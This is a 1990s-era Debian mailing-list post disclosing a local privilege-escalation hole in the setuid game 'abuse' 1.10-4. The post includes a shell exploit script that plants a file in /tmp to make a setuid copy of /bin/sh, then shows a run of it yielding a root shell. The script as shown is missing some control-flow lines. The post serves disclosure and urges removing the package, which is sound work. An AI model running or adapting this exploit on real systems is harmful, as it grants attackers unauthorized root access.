[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

IMPORTANT: abuse security hole. Debian is vunerable!

I applied this crack script to my system, with abuse 1.10-4 installed, and
it got me a root shell. I'm posting to debian-devel because I believe this
is a really old and well known hole in abuse, so I see no point in covering
this up.

Here's the script:


echo ================ abuser.sh - gain root on Linux Red Hat 2.1 system
echo ================ Checking system vulnerability
if test -u /usr/lib/games/abuse/abuse.console
echo ++++++++++++++++ System appears vulnerable.
cd /tmp
cat << _EOF_ > /tmp/undrv
/bin/cp /bin/sh /tmp/abuser
/bin/chmod 4777 /tmp/abuser
chmod +x /tmp/undrv
echo ================ Executing Abuse
/bin/rm /tmp/undrv
if test -u /tmp/abuser
echo ++++++++++++++++ Exploit successful, suid shell located in
echo ---------------- Exploit failed
echo ---------------- This machine does not appear to be vulnerable.


Here's a sample of it in use:

[joey@kite] /tmp>sh abuse_hole 
================ abuser.sh - gain root on Linux Red Hat 2.1 system
================ Checking system vulnerability
++++++++++++++++ System appears vulnerable.
================ Executing Abuse
 Abuse (Engine Version 1.10)
sh: lnx_sdrv: command not found
sound effects driver returned failure, sound effects disabled
Added himem block (4000000 bytes)
could not run undrv, please make sure it's in your path
No network driver, or network driver returned failure
Specs : main file set to abuse.spe
Lisp : 501 symbols defined, 99 system functions, 295 pre-compiled
Unable to open filename art/dev.spe for requested item c_mouse1
++++++++++++++++ Exploit successful, suid shell located in /tmp/abuser
[joey@kite] /tmp>abuser
bash# id
uid=500(joey) gid=500(joey) euid=0(root)
bash# whoami

For now, I reccommend that everyone dpkg -r abuse. Is abuse still being
maintained, or is it orphaned?

#!/usr/bin/perl -pl-                                   # ,,ep) ayf >|)nj,,
$_=reverse lc$_;s@"@''@g;y/[]{A-Y}<>()a-y1-9,!.?`'/][} #         Joey Hess
{><)(eq)paj6y!fk7wuodbjsfn^mxhl5Eh29L86`i'%,/;s@k@>|@g # jeh22@cornell.edu
               "true - do nothing, successfully" - - true (1)

Reply to: